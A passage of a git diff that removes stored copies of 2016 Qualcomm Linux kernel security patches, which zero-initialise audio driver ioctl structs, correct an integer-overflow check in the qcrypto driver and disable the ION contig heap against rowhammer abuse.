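- struct msm_audio_qcelp_enc_config *enc_cfg;
-
-+ memset(&cfg_32, 0, sizeof(cfg_32));
-+
- enc_cfg = (struct msm_audio_qcelp_enc_config *)audio->enc_cfg;
- cfg_32.cdma_rate = enc_cfg->cdma_rate;
- cfg_32.min_bit_rate = enc_cfg->min_bit_rate;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6698/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2016-6698/3.18/0002.patch
deleted file mode 100644
index 1195eb29..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6698/3.18/0002.patch
+++ /dev/null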
@@ -1,213 +0,0 @@
-From 3baefa3af45c0ab1ca8391821ea55b9049a3a3da Mon Sep 17 00:00:00 2001
-From: Laxminath Kasam
-Date: Mon, 29 Aug 2016 21:58:32 +0530
-Subject: misc: qcom: qdsp6v2: initialize config_32
-
-Not all members of config_32 are set before they are used which
-might lead to invalid values being passed and used. To fix this
-issue initialize all member variables of struct config_32 to 0 before
-assigning specific values individually.
-
-CRs-Fixed: 1058826
-Change-Id: Ifea3a6e8bf45481c65a4455ee64318304798fee2
-Signed-off-by: Laxminath Kasam
----
- drivers/misc/qcom/qdsp6v2/aac_in.c | 4 +++-
- drivers/misc/qcom/qdsp6v2/amrnb_in.c | 4 +++-
- drivers/misc/qcom/qdsp6v2/amrwb_in.c | 2 ++
- drivers/misc/qcom/qdsp6v2/audio_alac.c | 2 ++
- drivers/misc/qcom/qdsp6v2/audio_amrwbplus.c | 4 ++++
- drivers/misc/qcom/qdsp6v2/audio_ape.c | 2 ++
- drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c | 2 ++
- drivers/misc/qcom/qdsp6v2/audio_multi_aac.c | 2 ++
- drivers/misc/qcom/qdsp6v2/audio_utils_aio.c | 1 +
- drivers/misc/qcom/qdsp6v2/audio_wmapro.c | 2 ++
- drivers/misc/qcom/qdsp6v2/evrc_in.c | 4 +++-
- drivers/misc/qcom/qdsp6v2/qcelp_in.c | 4 +++-
- 12 files changed, 29 insertions(+), 4 deletions(-)
-
-diff --git a/drivers/misc/qcom/qdsp6v2/aac_in.c b/drivers/misc/qcom/qdsp6v2/aac_in.c
-index c9d5dbb..7176c114 100644
---- a/drivers/misc/qcom/qdsp6v2/aac_in.c
-+++ b/drivers/misc/qcom/qdsp6v2/aac_in.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2010-2015, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2010-2016, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -421,6 +421,8 @@ static long aac_in_compat_ioctl(struct file *file, unsigned int cmd,
- struct msm_audio_aac_enc_config cfg;
- struct msm_audio_aac_enc_config32 cfg_32;
-
-+ memset(&cfg_32, 0, sizeof(cfg_32));
-+
- cmd = AUDIO_GET_AAC_ENC_CONFIG;
- rc = aac_in_ioctl_shared(file, cmd, &cfg);
- if (rc) {
-diff --git a/drivers/misc/qcom/qdsp6v2/amrnb_in.c b/drivers/misc/qcom/qdsp6v2/amrnb_in.c
-index eb92137..9d4cf5c 100644
---- a/drivers/misc/qcom/qdsp6v2/amrnb_in.c
-+++ b/drivers/misc/qcom/qdsp6v2/amrnb_in.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2010-2012, 2014 The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2010-2016 The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -221,6 +221,8 @@ static long amrnb_in_compat_ioctl(struct file *file,
- struct msm_audio_amrnb_enc_config_v2 *amrnb_config;
- struct msm_audio_amrnb_enc_config_v2_32 amrnb_config_32;
-
-+ memset(&amrnb_config_32, 0, sizeof(amrnb_config_32));
-+
- amrnb_config =
- (struct msm_audio_amrnb_enc_config_v2 *)audio->enc_cfg;
- amrnb_config_32.band_mode = amrnb_config->band_mode;
-diff --git a/drivers/misc/qcom/qdsp6v2/amrwb_in.c b/drivers/misc/qcom/qdsp6v2/amrwb_in.c
-index 9bd19d9..43dcbd5 100644
---- a/drivers/misc/qcom/qdsp6v2/amrwb_in.c
-+++ b/drivers/misc/qcom/qdsp6v2/amrwb_in.c
-@@ -217,6 +217,8 @@ static long amrwb_in_compat_ioctl(struct file *file,
- struct msm_audio_amrwb_enc_config *amrwb_config;
- struct msm_audio_amrwb_enc_config_32 amrwb_config_32;
-
-+ memset(&amrwb_config_32, 0, sizeof(amrwb_config_32));
-+
- amrwb_config =
- (struct msm_audio_amrwb_enc_config *)audio->enc_cfg;
- amrwb_config_32.band_mode = amrwb_config->band_mode;
-diff --git a/drivers/misc/qcom/qdsp6v2/audio_alac.c b/drivers/misc/qcom/qdsp6v2/audio_alac.c
-index 7b18e3a..646d37d 100644
---- a/drivers/misc/qcom/qdsp6v2/audio_alac.c
-+++ b/drivers/misc/qcom/qdsp6v2/audio_alac.c
-@@ -196,6 +196,8 @@ static long audio_compat_ioctl(struct file *file, unsigned int cmd,
- struct msm_audio_alac_config *alac_config;
- struct msm_audio_alac_config_32 alac_config_32;
-
-+ memset(&alac_config_32, 0, sizeof(alac_config_32));
-+
- alac_config = (struct msm_audio_alac_config *)audio->codec_cfg;
- alac_config_32.frameLength = alac_config->frameLength;
- alac_config_32.compatVersion =
-diff --git a/drivers/misc/qcom/qdsp6v2/audio_amrwbplus.c b/drivers/misc/qcom/qdsp6v2/audio_amrwbplus.c
-index e96e23a..3c3f1c4 100644
---- a/drivers/misc/qcom/qdsp6v2/audio_amrwbplus.c
-+++ b/drivers/misc/qcom/qdsp6v2/audio_amrwbplus.c
-@@ -205,6 +205,10 @@ static long audio_compat_ioctl(struct file *file, unsigned int cmd,
- struct msm_audio_amrwbplus_config_v2 *amrwbplus_config;
- struct msm_audio_amrwbplus_config_v2_32
- amrwbplus_config_32;
-+
-+ memset(&amrwbplus_config_32, 0,
-+ sizeof(amrwbplus_config_32));
-+
- amrwbplus_config =
- (struct msm_audio_amrwbplus_config_v2 *)
- audio->codec_cfg;
-diff --git a/drivers/misc/qcom/qdsp6v2/audio_ape.c b/drivers/misc/qcom/qdsp6v2/audio_ape.c
-index 8d78124..7371512 100644
---- a/drivers/misc/qcom/qdsp6v2/audio_ape.c
-+++ b/drivers/misc/qcom/qdsp6v2/audio_ape.c
-@@ -180,6 +180,8 @@ static long audio_compat_ioctl(struct file *file, unsigned int cmd,
- struct msm_audio_ape_config *ape_config;
- struct msm_audio_ape_config_32 ape_config_32;
-
-+ memset(&ape_config_32, 0, sizeof(ape_config_32));
-+
- ape_config = (struct msm_audio_ape_config *)audio->codec_cfg;
- ape_config_32.compatibleVersion = ape_config->compatibleVersion;
- ape_config_32.compressionLevel =
-diff --git a/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c b/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c
-index 6843fd7..940fd08 100644
---- a/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c
-+++ b/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c
-@@ -630,6 +630,8 @@ static long audio_effects_compat_ioctl(struct file *file, unsigned int cmd,
- case AUDIO_EFFECTS_GET_BUF_AVAIL32: {
- struct msm_hwacc_buf_avail32 buf_avail;
-
-+ memset(&buf_avail, 0, sizeof(buf_avail));
-+
- buf_avail.input_num_avail = atomic_read(&effects->in_count);
- buf_avail.output_num_avail = atomic_read(&effects->out_count);
- pr_debug("%s: write buf avail: %d, read buf avail: %d\n",
-diff --git a/drivers/misc/qcom/qdsp6v2/audio_multi_aac.c b/drivers/misc/qcom/qdsp6v2/audio_multi_aac.c
-index 858f7bc..4ac74a5 100644
---- a/drivers/misc/qcom/qdsp6v2/audio_multi_aac.c
-+++ b/drivers/misc/qcom/qdsp6v2/audio_multi_aac.c
-@@ -302,6 +302,8 @@ static long audio_compat_ioctl(struct file *file, unsigned int cmd,
- struct msm_audio_aac_config *aac_config;
- struct msm_audio_aac_config32 aac_config_32;
-
-+ memset(&aac_config_32, 0, sizeof(aac_config_32));
-+
- aac_config = (struct msm_audio_aac_config *)audio->codec_cfg;
- aac_config_32.format = aac_config->format;
- aac_config_32.audio_object = aac_config->audio_object;
-diff --git a/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c b/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c
-index 4edc814..2b0af2e 100644
---- a/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c
-+++ b/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c
-@@ -2038,6 +2038,7 @@ static long audio_aio_compat_ioctl(struct file *file, unsigned int cmd,
- audio->buf_cfg.frames_per_buf);
-
- mutex_lock(&audio->lock);
-+ memset(&cfg_32, 0, sizeof(cfg_32));
- cfg_32.meta_info_enable = audio->buf_cfg.meta_info_enable;
- cfg_32.frames_per_buf = audio->buf_cfg.frames_per_buf;
- if (copy_to_user((void *)arg, &cfg_32,
-diff --git a/drivers/misc/qcom/qdsp6v2/audio_wmapro.c b/drivers/misc/qcom/qdsp6v2/audio_wmapro.c
-index 2c88e77..d389d9b 100644
---- a/drivers/misc/qcom/qdsp6v2/audio_wmapro.c
-+++ b/drivers/misc/qcom/qdsp6v2/audio_wmapro.c
-@@ -217,6 +217,8 @@ static long audio_compat_ioctl(struct file *file, unsigned int cmd,
- struct msm_audio_wmapro_config *wmapro_config;
- struct msm_audio_wmapro_config32 wmapro_config_32;
-
-+ memset(&wmapro_config_32, 0, sizeof(wmapro_config_32));
-+
- wmapro_config =
- (struct msm_audio_wmapro_config *)audio->codec_cfg;
- wmapro_config_32.armdatareqthr = wmapro_config->armdatareqthr;
-diff --git a/drivers/misc/qcom/qdsp6v2/evrc_in.c b/drivers/misc/qcom/qdsp6v2/evrc_in.c
-index 2f931be..aab8e27 100644
---- a/drivers/misc/qcom/qdsp6v2/evrc_in.c
-+++ b/drivers/misc/qcom/qdsp6v2/evrc_in.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2010-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2010-2016, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -224,6 +224,8 @@ static long evrc_in_compat_ioctl(struct file *file,
- struct msm_audio_evrc_enc_config32 cfg_32;
- struct msm_audio_evrc_enc_config *enc_cfg;
-
-+ memset(&cfg_32, 0, sizeof(cfg_32));
-+
- enc_cfg = audio->enc_cfg;
- cfg_32.cdma_rate = enc_cfg->cdma_rate;
- cfg_32.min_bit_rate = enc_cfg->min_bit_rate;
-diff --git a/drivers/misc/qcom/qdsp6v2/qcelp_in.c b/drivers/misc/qcom/qdsp6v2/qcelp_in.c
-index b5d5ad1..aabf5d3 100644
---- a/drivers/misc/qcom/qdsp6v2/qcelp_in.c
-+++ b/drivers/misc/qcom/qdsp6v2/qcelp_in.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2010-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2010-2016, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -225,6 +225,8 @@ static long qcelp_in_compat_ioctl(struct file *file,
- struct msm_audio_qcelp_enc_config32 cfg_32;
- struct msm_audio_qcelp_enc_config *enc_cfg;
-
-+ memset(&cfg_32, 0, sizeof(cfg_32));
-+
- enc_cfg = (struct msm_audio_qcelp_enc_config *)audio->enc_cfg;
- cfg_32.cdma_rate = enc_cfg->cdma_rate;
- cfg_32.min_bit_rate = enc_cfg->min_bit_rate;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6725/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2016-6725/3.10/0001.patch
deleted file mode 100644
index 5444206f..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6725/3.10/0001.patch
+++ /dev/null
@@ -1,40 +0,0 @@
-From cc95d644ee8a043f2883d65dda20e16f95041de3 Mon Sep 17 00:00:00 2001
-From: Zhen Kong
-Date: Tue, 16 Aug 2016 12:46:12 -0700
-Subject: msm: crypto: Fix integer over flow check in qcrypto driver
-
-Integer overflow check is invalid when ULONG_MAX is used,
-as ULONG_MAX has typeof 'unsigned long', while req->assoclen,
-req->crytlen, and qreq.ivsize are 'unsigned int'. Make change
-to use UINT_MAX instead of ULONG_MAX.
-
-CRs-fixed: 1050970
-Change-Id: I3782ea7ed2eaacdcad15b34e047a4699bf4f9e4f
-Signed-off-by: Zhen Kong
----
- drivers/crypto/msm/qcrypto.c | 6 +++---
- 1 file changed, 3 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/crypto/msm/qcrypto.c b/drivers/crypto/msm/qcrypto.c
-index 40a4105..2d83304 100644
---- a/drivers/crypto/msm/qcrypto.c
-+++ b/drivers/crypto/msm/qcrypto.c
-@@ -1870,12 +1870,12 @@ static int _qcrypto_process_aead(struct crypto_engine *pengine,
- * include assoicated data, ciphering data stream,
- * generated MAC, and CCM padding.
- */
-- if ((MAX_ALIGN_SIZE * 2 > ULONG_MAX - req->assoclen) ||
-+ if ((MAX_ALIGN_SIZE * 2 > UINT_MAX - req->assoclen) ||
- ((MAX_ALIGN_SIZE * 2 + req->assoclen) >
-- ULONG_MAX - qreq.ivsize) ||
-+ UINT_MAX - qreq.ivsize) ||
- ((MAX_ALIGN_SIZE * 2 + req->assoclen
- + qreq.ivsize)
-- > ULONG_MAX - req->cryptlen)) {
-+ > UINT_MAX - req->cryptlen)) {
- pr_err("Integer overflow on aead req length.\n");
- return -EINVAL;
- }
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6725/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2016-6725/3.18/0002.patch
deleted file mode 100644
index 0aac1c13..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6725/3.18/0002.patch
+++ /dev/null
@@ -1,40 +0,0 @@
-From a8bfc6888280ac70c9c13b1802c1e962522714a4 Mon Sep 17 00:00:00 2001
-From: Zhen Kong
-Date: Tue, 16 Aug 2016 12:46:12 -0700
-Subject: msm: crypto: Fix integer over flow check in qcrypto driver
-
-Integer overflow check is invalid when ULONG_MAX is used,
-as ULONG_MAX has typeof 'unsigned long', while req->assoclen,
-req->crytlen, and qreq.ivsize are 'unsigned int'. Make change
-to use UINT_MAX instead of ULONG_MAX.
-
-CRs-fixed: 1050970
-Change-Id: I3782ea7ed2eaacdcad15b34e047a4699bf4f9e4f
-Signed-off-by: Zhen Kong
----
- drivers/crypto/msm/qcrypto.c | 6 +++---
- 1 file changed, 3 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/crypto/msm/qcrypto.c b/drivers/crypto/msm/qcrypto.c
-index a975575..79e5ae9 100644
---- a/drivers/crypto/msm/qcrypto.c
-+++ b/drivers/crypto/msm/qcrypto.c
-@@ -2168,12 +2168,12 @@ static int _qcrypto_process_aead(struct crypto_engine *pengine,
- * include assoicated data, ciphering data stream,
- * generated MAC, and CCM padding.
- */
-- if ((MAX_ALIGN_SIZE * 2 > ULONG_MAX - req->assoclen) ||
-+ if ((MAX_ALIGN_SIZE * 2 > UINT_MAX - req->assoclen) ||
- ((MAX_ALIGN_SIZE * 2 + req->assoclen) >
-- ULONG_MAX - qreq.ivsize) ||
-+ UINT_MAX - qreq.ivsize) ||
- ((MAX_ALIGN_SIZE * 2 + req->assoclen
- + qreq.ivsize)
-- > ULONG_MAX - req->cryptlen)) {
-+ > UINT_MAX - req->cryptlen)) {
- pr_err("Integer overflow on aead req length.\n");
- return -EINVAL;
- }
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6728/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-6728/ANY/0001.patch
deleted file mode 100644
index 1b899dd2..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6728/ANY/0001.patch
+++ /dev/null
@@ -1,47 +0,0 @@
-From 37b3cefe6c01bed2e048d7a42b1c4021f4ba279d Mon Sep 17 00:00:00 2001
-From: Liam Mark
-Date: Wed, 12 Oct 2016 14:22:56 -0700
-Subject: ion: disable system contig heap
-
-A malicious application can take advantage of the ION contig heap to
-create a specific memory chunk size to exercise a rowhammer attack on the
-physical hardware.
-So remove support for the ION contig heap.
-
-Change-Id: I9cb454cebb74df291479cecc3533d2c684363f77
-Signed-off-by: Liam Mark
-Signed-off-by: Prakash Gupta
-Signed-off-by: Meghana Ashok
----
- drivers/gpu/ion/ion_heap.c | 8 +++++---
- 1 file changed, 5 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/gpu/ion/ion_heap.c b/drivers/gpu/ion/ion_heap.c
-index 98c1a8c..061e22a 100644
---- a/drivers/gpu/ion/ion_heap.c
-+++ b/drivers/gpu/ion/ion_heap.c
-@@ -26,8 +26,9 @@ struct ion_heap *ion_heap_create(struct ion_platform_heap *heap_data)
-
- switch ((int) heap_data->type) {
- case ION_HEAP_TYPE_SYSTEM_CONTIG:
-- heap = ion_system_contig_heap_create(heap_data);
-- break;
-+ pr_err("%s: Heap type is disabled: %d\n", __func__,
-+ heap_data->type);
-+ return ERR_PTR(-EINVAL);
- case ION_HEAP_TYPE_SYSTEM:
- heap = ion_system_heap_create(heap_data);
- break;
-@@ -71,7 +72,8 @@ void ion_heap_destroy(struct ion_heap *heap)
-
- switch ((int) heap->type) {
- case ION_HEAP_TYPE_SYSTEM_CONTIG:
-- ion_system_contig_heap_destroy(heap);
-+ pr_err("%s: Heap type is disabled: %d\n", __func__,
-+ heap->type);
- break;
- case ION_HEAP_TYPE_SYSTEM:
- ion_system_heap_destroy(heap);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6728/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2016-6728/ANY/0002.patch
deleted file mode 100644
index 3ded682e..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6728/ANY/0002.patch
+++ /dev/null
@@ -1,326 +0,0 @@
-From a3fe90fbd3500e7ecaa32b9da5e582d78cb5cef9 Mon Sep 17 00:00:00 2001
-From: Liam Mark
-Date: Wed, 12 Oct 2016 14:22:56 -0700
-Subject: ion: disable system contig heap
-
-A malicious application can take advantage of the ION contig heap to
-create a specific memory chunk size to exercise a rowhammer attack on the
-physical hardware.
-So remove support for the ION contig heap.
-
-Change-Id: I9cb454cebb74df291479cecc3533d2c684363f77
-Signed-off-by: Liam Mark
-Signed-off-by: Prakash Gupta
-Signed-off-by: Paresh Purabhiya
----
- arch/arm/boot/dts/qcom/apq8084-ion.dtsi | 7 +------
- arch/arm/boot/dts/qcom/msm8226-ion.dtsi | 7 +------
- arch/arm/boot/dts/qcom/msm8226-w-ion.dtsi | 7 +------
- arch/arm/boot/dts/qcom/msm8610-ion.dtsi | 7 +------
- arch/arm/boot/dts/qcom/msm8909-ion.dtsi | 5 -----
- arch/arm/boot/dts/qcom/msm8916-512mb-ion.dtsi | 7 +------
- arch/arm/boot/dts/qcom/msm8916-ion.dtsi | 7 +------
- arch/arm/boot/dts/qcom/msm8939-ion.dtsi | 7 +------
- arch/arm/boot/dts/qcom/msm8974-ion.dtsi | 7 +------
- arch/arm/boot/dts/qcom/msm8992-ion.dtsi | 7 +------
- arch/arm/boot/dts/qcom/msm8994-ion.dtsi | 7 +------
- arch/arm/boot/dts/qcom/msmtellurium-ion.dtsi | 7 +------
- drivers/staging/android/ion/ion_heap.c | 10 ++++++----
- 13 files changed, 17 insertions(+), 75 deletions(-)
-
-diff --git a/arch/arm/boot/dts/qcom/apq8084-ion.dtsi b/arch/arm/boot/dts/qcom/apq8084-ion.dtsi
-index bd649fe..436a966 100644
---- a/arch/arm/boot/dts/qcom/apq8084-ion.dtsi
-+++ b/arch/arm/boot/dts/qcom/apq8084-ion.dtsi
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2013-2014, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2013-2014,2016, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -21,11 +21,6 @@
- qcom,ion-heap-type = "SYSTEM";
- };
-
-- qcom,ion-heap@21 {
-- reg = <21>;
-- qcom,ion-heap-type = "SYSTEM_CONTIG";
-- };
--
- qcom,ion-heap@8 { /* CP_MM HEAP */
- compatible = "qcom,msm-ion-reserve";
- reg = <8>;
-diff --git a/arch/arm/boot/dts/qcom/msm8226-ion.dtsi b/arch/arm/boot/dts/qcom/msm8226-ion.dtsi
-index b3c25a3..949f506 100644
---- a/arch/arm/boot/dts/qcom/msm8226-ion.dtsi
-+++ b/arch/arm/boot/dts/qcom/msm8226-ion.dtsi
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2014, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2014,2016, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -21,11 +21,6 @@
- qcom,ion-heap-type = "SYSTEM";
- };
-
-- system_contig_heap: qcom,ion-heap@21 {
-- reg = <21>;
-- qcom,ion-heap-type = "SYSTEM_CONTIG";
-- };
--
- cp_mm_heap: qcom,ion-heap@8 { /* CP_MM HEAP */
- compatible = "qcom,msm-ion-reserve";
- reg = <8>;
-diff --git a/arch/arm/boot/dts/qcom/msm8226-w-ion.dtsi b/arch/arm/boot/dts/qcom/msm8226-w-ion.dtsi
-index 1ac36e0..e638bc5 100644
---- a/arch/arm/boot/dts/qcom/msm8226-w-ion.dtsi
-+++ b/arch/arm/boot/dts/qcom/msm8226-w-ion.dtsi
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2014, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2014,2016, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -21,11 +21,6 @@
- qcom,ion-heap-type = "SYSTEM";
- };
-
-- system_contig_heap: qcom,ion-heap@21 {
-- reg = <21>;
-- qcom,ion-heap-type = "SYSTEM_CONTIG";
-- };
--
- qsecom_heap: qcom,ion-heap@27 { /* QSECOM HEAP */
- compatible = "qcom,msm-ion-reserve";
- reg = <27>;
-diff --git a/arch/arm/boot/dts/qcom/msm8610-ion.dtsi b/arch/arm/boot/dts/qcom/msm8610-ion.dtsi
-index a7a428b..22ba8c1 100644
---- a/arch/arm/boot/dts/qcom/msm8610-ion.dtsi
-+++ b/arch/arm/boot/dts/qcom/msm8610-ion.dtsi
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2014, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2014,2016, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -21,11 +21,6 @@
- qcom,ion-heap-type = "SYSTEM";
- };
-
-- qcom,ion-heap@21 {
-- reg = <21>;
-- qcom,ion-heap-type = "SYSTEM_CONTIG";
-- };
--
- qcom,ion-heap@27 { /* QSECOM HEAP */
- compatible = "qcom,msm-ion-reserve";
- reg = <27>;
-diff --git a/arch/arm/boot/dts/qcom/msm8909-ion.dtsi b/arch/arm/boot/dts/qcom/msm8909-ion.dtsi
-index 509e361..7ec0690 100644
---- a/arch/arm/boot/dts/qcom/msm8909-ion.dtsi
-+++ b/arch/arm/boot/dts/qcom/msm8909-ion.dtsi
-@@ -21,11 +21,6 @@
- qcom,ion-heap-type = "SYSTEM";
- };
-
-- system_contig_heap: qcom,ion-heap@21 {
-- reg = <21>;
-- qcom,ion-heap-type = "SYSTEM_CONTIG";
-- };
--
- qsecom_heap: qcom,ion-heap@27 { /* QSEECOM HEAP */
- compatible = "qcom,msm-ion-reserve";
- reg = <27>;
-diff --git a/arch/arm/boot/dts/qcom/msm8916-512mb-ion.dtsi b/arch/arm/boot/dts/qcom/msm8916-512mb-ion.dtsi
-index b688a10..2cebe62 100644
---- a/arch/arm/boot/dts/qcom/msm8916-512mb-ion.dtsi
-+++ b/arch/arm/boot/dts/qcom/msm8916-512mb-ion.dtsi
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2014, Linux Foundation. All rights reserved.
-+/* Copyright (c) 2014,2016, Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -21,11 +21,6 @@
- qcom,ion-heap-type = "SYSTEM";
- };
-
-- qcom,ion-heap@21 {
-- reg = <21>;
-- qcom,ion-heap-type = "SYSTEM_CONTIG";
-- };
--
- qcom,ion-heap@27 { /* QSEECOM HEAP */
- compatible = "qcom,msm-ion-reserve";
- reg = <27>;
-diff --git a/arch/arm/boot/dts/qcom/msm8916-ion.dtsi b/arch/arm/boot/dts/qcom/msm8916-ion.dtsi
-index 80baf241..53e85b9 100644
---- a/arch/arm/boot/dts/qcom/msm8916-ion.dtsi
-+++ b/arch/arm/boot/dts/qcom/msm8916-ion.dtsi
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2014, Linux Foundation. All rights reserved.
-+/* Copyright (c) 2014,2016, Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -21,11 +21,6 @@
- qcom,ion-heap-type = "SYSTEM";
- };
-
-- qcom,ion-heap@21 {
-- reg = <21>;
-- qcom,ion-heap-type = "SYSTEM_CONTIG";
-- };
--
- qcom,ion-heap@8 { /* CP_MM HEAP */
- compatible = "qcom,msm-ion-reserve";
- reg = <8>;
-diff --git a/arch/arm/boot/dts/qcom/msm8939-ion.dtsi b/arch/arm/boot/dts/qcom/msm8939-ion.dtsi
-index f5e7054..39e3fa5 100644
---- a/arch/arm/boot/dts/qcom/msm8939-ion.dtsi
-+++ b/arch/arm/boot/dts/qcom/msm8939-ion.dtsi
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2014, Linux Foundation. All rights reserved.
-+/* Copyright (c) 2014,2016, Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -21,11 +21,6 @@
- qcom,ion-heap-type = "SYSTEM";
- };
-
-- qcom,ion-heap@21 {
-- reg = <21>;
-- qcom,ion-heap-type = "SYSTEM_CONTIG";
-- };
--
- qcom,ion-heap@8 { /* CP_MM HEAP */
- compatible = "qcom,msm-ion-reserve";
- reg = <8>;
-diff --git a/arch/arm/boot/dts/qcom/msm8974-ion.dtsi b/arch/arm/boot/dts/qcom/msm8974-ion.dtsi
-index de751a0..e9ead3c 100644
---- a/arch/arm/boot/dts/qcom/msm8974-ion.dtsi
-+++ b/arch/arm/boot/dts/qcom/msm8974-ion.dtsi
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2014, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2014,2016, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -21,11 +21,6 @@
- qcom,ion-heap-type = "SYSTEM";
- };
-
-- qcom,ion-heap@21 {
-- reg = <21>;
-- qcom,ion-heap-type = "SYSTEM_CONTIG";
-- };
--
- qcom,ion-heap@8 { /* CP_MM HEAP */
- compatible = "qcom,msm-ion-reserve";
- reg = <8>;
-diff --git a/arch/arm/boot/dts/qcom/msm8992-ion.dtsi b/arch/arm/boot/dts/qcom/msm8992-ion.dtsi
-index b359777..ec9bdab 100644
---- a/arch/arm/boot/dts/qcom/msm8992-ion.dtsi
-+++ b/arch/arm/boot/dts/qcom/msm8992-ion.dtsi
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2014, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2014,2016, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -21,11 +21,6 @@
- qcom,ion-heap-type = "SYSTEM";
- };
-
-- qcom,ion-heap@21 {
-- reg = <21>;
-- qcom,ion-heap-type = "SYSTEM_CONTIG";
-- };
--
- qcom,ion-heap@22 { /* adsp heap */
- reg = <22>;
- linux,contiguous-region = <&adsp_mem>;
-diff --git a/arch/arm/boot/dts/qcom/msm8994-ion.dtsi b/arch/arm/boot/dts/qcom/msm8994-ion.dtsi
-index 16b920e..deea46f 100644
---- a/arch/arm/boot/dts/qcom/msm8994-ion.dtsi
-+++ b/arch/arm/boot/dts/qcom/msm8994-ion.dtsi
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2014, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2014,2016, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -21,11 +21,6 @@
- qcom,ion-heap-type = "SYSTEM";
- };
-
-- qcom,ion-heap@21 {
-- reg = <21>;
-- qcom,ion-heap-type = "SYSTEM_CONTIG";
-- };
--
- qcom,ion-heap@8 { /* CP_MM HEAP */
- compatible = "qcom,msm-ion-reserve";
- reg = <8>;
-diff --git a/arch/arm/boot/dts/qcom/msmtellurium-ion.dtsi b/arch/arm/boot/dts/qcom/msmtellurium-ion.dtsi
-index 79fc0e4..3e8058e 100644
---- a/arch/arm/boot/dts/qcom/msmtellurium-ion.dtsi
-+++ b/arch/arm/boot/dts/qcom/msmtellurium-ion.dtsi
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2014, Linux Foundation. All rights reserved.
-+/* Copyright (c) 2014,2016, Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -21,11 +21,6 @@
